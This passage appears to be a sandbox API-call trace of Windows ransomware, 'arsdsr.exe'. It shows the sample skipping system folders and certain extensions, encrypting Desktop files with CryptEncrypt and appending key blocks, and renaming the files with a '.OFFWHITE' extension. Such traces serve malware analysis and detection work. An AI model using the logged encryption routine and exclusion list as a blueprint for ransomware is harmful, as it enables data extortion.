RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.022] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.022] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.022] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.022] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.022] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.023] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xeea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.023] SetLastError (dwErrCode=0x0) [0132.023] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.026] GetLastError () returned 0x0 [0132.026] GetLastError () returned 0x0 [0132.026] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xefa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.026] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.027] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xf0a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.027] WriteFile (in: hFile=0xb0, lpBuffer=0x547eb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547eb8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.027] GetProcessHeap () returned 0x500000 [0132.027] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xeea0) returned 0x5557b0 [0132.027] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.027] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0xeea0, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0xeea0, lpOverlapped=0x0) returned 1 [0132.032] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.032] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0xeea0, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0xeea0, lpOverlapped=0x0) returned 1 [0132.032] GetProcessHeap () returned 0x500000 [0132.032] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.032] CloseHandle (hObject=0xb0) returned 1 [0132.037] GetProcessHeap () returned 0x500000 [0132.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.037] GetProcessHeap () returned 0x500000 [0132.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.037] GetProcessHeap () returned 0x500000 [0132.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.037] GetProcessHeap () returned 0x500000 [0132.037] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.037] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav" [0132.037] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav.OFFWHITE" [0132.037] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a8wugsk.wav"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\a8wUGSK.wav.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a8wugsk.wav.offwhite")) returned 1 [0132.039] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7fbca00, ftCreationTime.dwHighDateTime=0x1d62251, ftLastAccessTime.dwLowDateTime=0xa7fbca00, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xaaf3bc00, ftLastWriteTime.dwHighDateTime=0x1d6224b, nFileSizeHigh=0x0, nFileSizeLow=0x5530, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="arsdsr.exe", cAlternateFileName="")) returned 1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2=".") returned 1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="..") returned 1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="...") returned 1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="windows") returned -1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="$recycle.bin") returned 1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="rsa") returned -1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="ntuser.dat") returned -1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="programdata") returned -1 [0132.039] lstrcmpiW (lpString1="arsdsr.exe", lpString2="appdata") returned 1 [0132.040] lstrcmpiW (lpString1="arsdsr.exe", lpString2="program files") returned -1 [0132.040] lstrcmpiW (lpString1="arsdsr.exe", lpString2="program files (x86)") returned -1 [0132.040] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.040] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="arsdsr.exe" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\arsdsr.exe" [0132.040] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.040] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.040] PathFindExtensionW (pszPath="arsdsr.exe") returned=".exe" [0132.040] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0132.040] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa530f4e0, ftCreationTime.dwHighDateTime=0x1d5e3c1, ftLastAccessTime.dwLowDateTime=0xb1bb6400, ftLastAccessTime.dwHighDateTime=0x1d5e4d6, ftLastWriteTime.dwLowDateTime=0xb1bb6400, ftLastWriteTime.dwHighDateTime=0x1d5e4d6, nFileSizeHigh=0x0, nFileSizeLow=0x12698, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="c8KF4RFxjqbJeK.swf", cAlternateFileName="C8KF4R~1.SWF")) returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2=".") returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="..") returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="...") returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="windows") returned -1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="$recycle.bin") returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="rsa") returned -1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="ntuser.dat") returned -1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="programdata") returned -1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="appdata") returned 1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="program files") returned -1 [0132.040] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="program files (x86)") returned -1 [0132.040] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.040] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="c8KF4RFxjqbJeK.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf" [0132.040] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.041] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.041] PathFindExtensionW (pszPath="c8KF4RFxjqbJeK.swf") returned=".swf" [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0132.041] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0132.041] lstrcmpiW (lpString1="c8KF4RFxjqbJeK.swf", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.041] GetProcessHeap () returned 0x500000 [0132.041] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ec8 [0132.041] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c8kf4rfxjqbjek.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.042] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=75416) returned 1 [0132.042] GetProcessHeap () returned 0x500000 [0132.042] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.042] GetProcessHeap () returned 0x500000 [0132.042] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.042] GetProcessHeap () returned 0x500000 [0132.042] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.042] GetProcessHeap () returned 0x500000 [0132.042] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.042] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.042] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.042] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.042] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.043] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.043] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.043] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.043] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.043] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12698, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.043] SetLastError (dwErrCode=0x0) [0132.043] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.047] GetLastError () returned 0x0 [0132.048] GetLastError () returned 0x0 [0132.048] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12798, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.048] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.048] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12898, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.048] WriteFile (in: hFile=0xb0, lpBuffer=0x547ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ec8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.048] GetProcessHeap () returned 0x500000 [0132.048] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12698) returned 0x5557b0 [0132.048] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.048] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x12698, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x12698, lpOverlapped=0x0) returned 1 [0132.054] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.054] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x12698, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x12698, lpOverlapped=0x0) returned 1 [0132.054] GetProcessHeap () returned 0x500000 [0132.054] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0132.055] CloseHandle (hObject=0xb0) returned 1 [0132.065] GetProcessHeap () returned 0x500000 [0132.065] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.065] GetProcessHeap () returned 0x500000 [0132.065] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.065] GetProcessHeap () returned 0x500000 [0132.065] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.065] GetProcessHeap () returned 0x500000 [0132.066] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.066] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf" [0132.066] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf.OFFWHITE" [0132.066] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c8kf4rfxjqbjek.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c8KF4RFxjqbJeK.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c8kf4rfxjqbjek.swf.offwhite")) returned 1 [0132.067] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd385bfc0, ftCreationTime.dwHighDateTime=0x1d5e7c1, ftLastAccessTime.dwLowDateTime=0x61fd4290, ftLastAccessTime.dwHighDateTime=0x1d5e782, ftLastWriteTime.dwLowDateTime=0x61fd4290, ftLastWriteTime.dwHighDateTime=0x1d5e782, nFileSizeHigh=0x0, nFileSizeLow=0x12c79, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="cQmMoFz3.odt", cAlternateFileName="")) returned 1 [0132.067] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2=".") returned 1 [0132.067] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="..") returned 1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="...") returned 1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="windows") returned -1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="$recycle.bin") returned 1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="rsa") returned -1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="ntuser.dat") returned -1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="programdata") returned -1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="appdata") returned 1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="program files") returned -1 [0132.068] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="program files (x86)") returned -1 [0132.068] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.068] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="cQmMoFz3.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt" [0132.068] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.068] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.068] PathFindExtensionW (pszPath="cQmMoFz3.odt") returned=".odt" [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0132.068] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0132.069] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0132.069] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0132.069] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0132.069] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0132.069] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0132.069] lstrcmpiW (lpString1="cQmMoFz3.odt", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.069] GetProcessHeap () returned 0x500000 [0132.069] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547ed8 [0132.069] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cQmMoFz3.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cqmmofz3.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.069] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=76921) returned 1 [0132.069] GetProcessHeap () returned 0x500000 [0132.069] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.070] GetProcessHeap () returned 0x500000 [0132.070] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.070] GetProcessHeap () returned 0x500000 [0132.070] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.070] GetProcessHeap () returned 0x500000 [0132.070] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.070] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.070] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.070] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.070] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.070] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.071] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.071] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12c79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.071] SetLastError (dwErrCode=0x0) [0132.071] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.073] GetLastError () returned 0x0 [0132.073] GetLastError () returned 0x0 [0132.073] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12d79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.073] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.073] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x12e79, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.073] WriteFile (in: hFile=0xb0, lpBuffer=0x547ed8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547ed8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.073] GetProcessHeap () returned 0x500000 [0132.073] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12c79) returned 0x5557b0 [0132.074] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.074] ReadFile (in: hFile=0xb0, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x12c79, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x12c79, lpOverlapped=0x0) returned 1 [0132.079] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.079] WriteFile (in: hFile=0xb0, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x12c79, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, 